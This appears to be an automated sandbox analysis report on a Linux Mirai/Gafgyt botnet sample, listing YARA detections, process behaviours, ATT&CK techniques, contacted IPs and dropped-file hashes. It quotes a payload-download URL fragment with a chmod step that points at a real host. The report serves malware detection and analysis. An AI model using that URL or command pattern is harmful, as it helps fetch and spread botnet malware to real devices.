fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: classification engine Classification label: mal88.spre.troj.evad.linELF@0/16@3/0

      Data Obfuscation

      Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

      Persistence and Installation Behavior

      Source: /bin/fusermount (PID: 6433) File: /proc/6433/mounts
      Source: /usr/bin/gpu-manager (PID: 6383) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6385) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6388) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6391) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6393) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6396) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6399) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6402) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /bin/sh (PID: 6384) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6386) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6389) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6392) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6395) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6397) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6400) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6403) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /usr/share/gdm/generate-config (PID: 6406) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
      Source: /usr/bin/dash (PID: 6222) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
      Source: /usr/bin/dash (PID: 6231) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
      Source: /usr/sbin/gdm3 (PID: 6408) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/sbin/gdm3 (PID: 6408) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/bin/gpu-manager (PID: 6381) Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6443) Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6453) Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6463) Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6473) Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6483) Log file created: /var/log/gpu-manager.log

      Hooking and other Techniques for Hiding and Protection

      Source: /tmp/xd.x86_64.elf (PID: 6261) File: /usr/lib/systemd/systemd
      Source: /tmp/xd.x86_64.elf (PID: 6261) File: /usr/lib/systemd/systemd (deleted)
      Source: /tmp/xd.x86_64.elf (PID: 6261) File: /usr/bin/dash
      Source: /tmp/xd.x86_64.elf (PID: 6261) File: /usr/bin/pulseaudio
      Source: /tmp/xd.x86_64.elf (PID: 6261) File: /usr/sbin/gdm3
      Source: xd.x86_64.elf Submission file: segment LOAD with 7.9647 entropy (max. 8.0)
      Source: /usr/bin/gpu-manager (PID: 6381) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6443) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6453) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6463) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6473) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6483) Truncated file: /var/log/gpu-manager.log
      Source: /usr/bin/pulseaudio (PID: 6374) Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pkill (PID: 6406) Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pulseaudio (PID: 6374) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6381) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6443) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6453) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6463) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6473) Queries kernel information via 'uname'
      Source: /usr/bin/gpu-manager (PID: 6483) Queries kernel information via 'uname'

      Stealing of Sensitive Information

      Source: Yara match File source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match File source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTR
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Service Stop
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Obfuscated Files or Information | Security Account Manager | 1 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Indicator Removal | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 File Deletion | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      No configs have been found
      [Behavior graph (image not reproduced): Behavior Graph ID: 1654966, Sample: xd.x86_64.elf, Startdate: 02/04/2025, Architecture: LINUX, Score: 88]
      Source | Detection | Scanner | Label | Link
      xd.x86_64.elf | 44% | ReversingLabs | Linux.Backdoor.Mirai |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://213.209.129.92/d/xd.arm7;chmod | 0% | Avira URL Cloud | safe |


      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      daisy.ubuntu.com | 162.213.35.25 | true | false | | high

      Name | Malicious | Antivirus Detection | Reputation
      https://daisy.ubuntu.com/9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e | false | | high

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://213.209.129.92/d/xd.arm7;chmod | xd.x86_64.elf, 6260.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6262.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6263.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6264.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6265.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6266.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6268.1.0000000000400000.0000000000415000.r-x.sdmp | false | Avira URL Cloud: safe | unknown
      http://upx.sf.net | xd.x86_64.elf | false | | high
            unknownunknownfalse
            220.207.160.167
            unknownChina
            4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
            158.98.57.71
            unknownUnited States
            1226CTA-42-AS1226USfalse
            72.203.37.240
            unknownUnited States
            22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
            189.254.49.59
            unknownMexico
            8151UninetSAdeCVMXfalse
            188.246.192.92
            unknownUnited Kingdom
            8916PORTFASTGBfalse
            162.213.35.24
            unknownUnited States
            41231CANONICAL-ASGBfalse
            247.204.7.139
            unknownReserved
            unknownunknownfalse
            116.22.120.195
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            112.234.76.96
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            198.97.53.33
            unknownUnited States
            393378SACFCU-P7148USfalse
            253.52.231.222
            unknownReserved
            unknownunknownfalse
            159.34.85.128
            unknownUnited Kingdom
            25019SAUDINETSTC-ASSAfalse
            172.225.70.132
            unknownUnited States
            16625AKAMAI-ASUSfalse
            218.134.28.158
            unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
            113.150.21.42
            unknownJapan2516KDDIKDDICORPORATIONJPfalse
            2.80.2.208
            unknownPortugal
            3243MEO-RESIDENCIALPTfalse
            213.175.48.125
            unknownCzech Republic
            29208DIALTELECOM-ASDialTelecomasSKfalse
            165.109.69.21
            unknownUnited States
            7926FICOUSfalse
            68.166.120.203
            unknownUnited States
            18566MEGAPATH5-USfalse
                                                    Process:/usr/bin/pulseaudio
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):10
                                                    Entropy (8bit):2.9219280948873623
                                                    Encrypted:false
                                                    SSDEEP:3:5bkPn:pkP
                                                    MD5:FF001A15CE15CF062A3704CEA2991B5F
                                                    SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                                                    SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                                                    SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:auto_null.
                                                    Process:/usr/bin/pulseaudio
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):18
                                                    Entropy (8bit):3.4613201402110088
                                                    Encrypted:false
                                                    SSDEEP:3:5bkrIZsXvn:pkckv
                                                    MD5:28FE6435F34B3367707BB1C5D5F6B430
                                                    SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                                                    SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                                                    SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:auto_null.monitor.
                                                    Process:/usr/sbin/gdm3
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):2.321928094887362
                                                    Encrypted:false
                                                    SSDEEP:3:9:9
                                                    MD5:E2852C79E215DA81CB6A9144C342C93A
                                                    SHA1:019A36F63C25A61295EE1392E732AD026EA15B7A
                                                    SHA-256:AC7E499BD761809A7DAAD8C50C1DF4DBE41A31874F2E64F050226EE9E01A41E3
                                                    SHA-512:AD986843B83D40D498E7C25C043CB1A5B1B3308B4A92FEB86DD1F26D3AACDB4A276FC7613A6A73536631F9BBD690DA3C425E8A5C3C58F7AD1DD44A4963C3549B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:6408.
                                                    Process:/usr/bin/pulseaudio
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):2.321928094887362
                                                    Encrypted:false
                                                    SSDEEP:3:ZJ:3
                                                    MD5:0B81E3557F5A8F4C80FD3019BAE5B2A8
                                                    SHA1:6513EDB0A74AB0B971C3BA40438A1503DCE5BEDD
                                                    SHA-256:47D91EFF9864643B8A02369B85CEE34752D7C506D1E65EC281931E060D03195F
                                                    SHA-512:DE11D2D133461CD8EB736C5BDA6465FCF50F73C82AF7F4610B58211BAA5BBD3E3D7DF894BB2184FC410FB6DE1E24A88CDFB2F729DB285D5694ABC645F4C4F539
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:6374.
                                                    Process:/usr/bin/gpu-manager
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):2.7550849518197795
                                                    Encrypted:false
                                                    SSDEEP:3:JoT/V9fDVbn:M/V3n
                                                    MD5:078760523943E160756979906B85FB5E
                                                    SHA1:0962643266F4C5537F7D125046F28F21D6DD0C89
                                                    SHA-256:048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
                                                    SHA-512:DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:15ad:0405;0000:00:0f:0;1.
                                                    Process:/usr/bin/gpu-manager
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):1371
                                                    Entropy (8bit):4.8296848499188485
                                                    Encrypted:false
                                                    SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
